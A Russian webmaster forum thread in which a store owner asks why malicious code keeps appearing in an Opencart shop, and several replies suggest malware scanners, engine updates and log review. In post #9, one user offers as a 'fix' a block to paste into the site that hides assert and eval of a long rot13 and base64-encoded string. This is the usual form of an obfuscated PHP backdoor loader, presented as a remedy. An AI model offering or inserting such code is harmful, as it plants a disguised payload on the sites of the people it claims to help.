Помощник
|
В мгазин Opencart внедряют вредоносный код, Как защититься от взлома? |
maxmer
|
Сообщение
#1
|
||
|
|
||
|
|||
web2033 |
17.6.2015, 21:13;
Ответить: web2033
Сообщение
#2
|
|
Попробуйте этот сервис:
AI-Bolit — это бесплатный сканер вирусов, хакерских шеллов, бэкдоров, спам-рассыльщиков и других вредоносных скриптов на хостинге. |
|
|
maxmer
|
Сообщение
#3
|
|
AI-Bolit к сожалению ничего не находит. Всякие онлайн-проверки на вирусы тоже молчат. Но как-то же заливают гадость?
-------------------- - Зарабатываю в РСЯ через https://app.adprofit.world/login/registration?u=219 |
|
|
Maksimus |
18.6.2015, 18:17;
Ответить: Maksimus
Сообщение
#4
|
|
Добрый день! У меня была такая же проблема на этой платформе,попробуйте воспользоваться этим скриптом от яндекса http://yandex.ru/promo/manul#howtouse
Сообщение отредактировал Maksimus - 18.6.2015, 18:18 |
|
|
maxmer
|
Сообщение
#5
|
|
Maksimus, спасибо. Пробовал тоже этот скрипт. К сожалению ничего не нашел. Может есть какая-нибудь уязвимость в этой версии Opencart?
-------------------- - Зарабатываю в РСЯ через https://app.adprofit.world/login/registration?u=219 |
|
|
Sev_free |
21.6.2015, 11:31;
Ответить: Sev_free
Сообщение
#6
|
|
maxmer, пришли в личку ссылку на сайт, погляжу. Скорее всего тебе шелл залили, либо нашли где не фильтруется запрос в бд.
-------------------- Контакты: Skype:Sev_Free |
|
|
Feax |
26.6.2015, 9:58;
Ответить: Feax
Сообщение
#7
|
|
Антивирусом вычищать вирусы - это борьба со следствием, чтобы избавиться от причины, нужно либо обновляться на самую свежую версию движка, либо смотреть логи доступа к сайту, искать в них способ взлома и закрывать дыру.
|
|
|
lawebo |
26.6.2015, 22:54;
Ответить: lawebo
Сообщение
#8
|
|
скорей всего шелл, можно пройтись вручную по файлам поискать недавно измененые или которых явно не должно быть...
было похожее на опенкарте в футер код вставляли, нашел левый файлик в image/cache/ |
|
|
Sev_free |
26.6.2015, 23:47;
Ответить: Sev_free
Сообщение
#9
|
|
Оберни с заменой :
Код if (isset($ibv){ break; КОД }; КОД замени на : Код //###=i=### error_reporting(0); $strings = "as";$strings .= "sert"; @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUgcMvtuMJ1jqUxbWS9QG09YFHIo VzAfnJIhqS9wnTIwnlWqXFyxnJHbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXGgcMvtunKAmMKDbWTAs J lWVISEDK0SQD0IDIS9QFRSFH0IHVy0cXKgcMvujpzIaK21uqTAbXPVuYvS1VvkznJkyK2qyqS9wo250M J 50pltxK1ASHyMSHyfvH0AFFIOHK0MWGRIBDH1SVy0cXFy7WTZjCFWIIRLgBPV7sJIfp2I7WTZjCFW3nJ 5 xo3qmYGRlAGRvB319MJkmMKfxLmN9WTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy07sJyzXTM1ozA0nJ9 h K2I4nKA0pltvL3IloS9cozy0VvxcrlEwZG1wqKWfK2yhnKDbVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9a M KDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH 1 EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYv E wZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvAGxjZJSwZwt4MGD l AGR5AGV0MGt2Z2MzLmtjZ2SuZQDvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISI E IAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7L3IloS9mMKEipUDbW T ZkYQDlYTMuoUAyXGgwqKWfK3AyqT9jqPtxLmRfZGx5ZGZfqUW1MFx7WTyvqvN9VPOwqKWfK2I4MJZbWT Z kXGgwqKWfK2Afo3AyXPEwZFx7sJIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXG09ZFy7WTy v qvN9VTMcoTIsM2I0K2AioaEyoaEmXPWbqUEjBv8iZGN5YwVmAv44ZF4kZQRiM2I0YaObpQ9xCFVhqKWf M J5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9V v 51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv 4 xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwH5ZQSuLmV4BTH0ZwHkBGHlATH4AwAzMzZ 4 ZQAuLGN0Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1AS H yMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB30tnJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tW T yvqwftsFOcMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwuvMzEwMJ Z 4VvxtrlONLKAmMKW0XPEsHxIEIHIGISfvLlWqXGftsK0="));')); //###=i=### И не парься) А так поднимай логи ищи шелл) П.С. А так помочь можно только при наличии ссылки на сайт и к бекапу файлов. Сообщение отредактировал Sev_free - 26.6.2015, 23:53 -------------------- Контакты: Skype:Sev_Free |
|
|
SeBun |
26.9.2015, 13:44;
Ответить: SeBun
Сообщение
#10
|
|
maxmer, у вас случайно сайт не на timeweb? От движка этот взлом не зависит, заражаются все index.php на всех сайтах аккаунта. Хостер свою вину не признает. Вот тема. Пока разбираюсь. Восстановил все сайты из бекапа, пока полет нормальный. Анализирую зараженные в поисках шелла.
|
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Разработка сайтов Joomla Wordpress Opencart Разработка, верстка, оптимизация веб сайтов. |
77 | WoWeb | 40422 | 3.9.2023, 16:52 автор: Sawich |
|
Техподдержка сайтов на движках Joomla, Netcat, Opencart | 5 | 54web | 4288 | 22.1.2023, 13:27 автор: kikimora17 |
|
Создание интернет-магазинов на CMS OpenCart 3.* Готовое решение, современный дизайн, быстрый запуск! |
0 | M-seo | 2523 | 27.6.2022, 2:01 автор: M-seo |
|
Специалист OpenCart 1.5 / 2.x / 3.x Большой опыт разработки магазинов / сайтов услуг / доработка |
1 | nash | 6057 | 24.11.2021, 16:53 автор: No_signal |
|
Перенос (обновление) OpenCart и OcStore на новую версию 2х - 3х Перенесу ваш магазин на новую версию движка |
3 | Илья1981 | 8442 | 4.10.2021, 11:59 автор: Evgen_ppm |
Текстовая версия | Сейчас: 18.4.2024, 5:20 |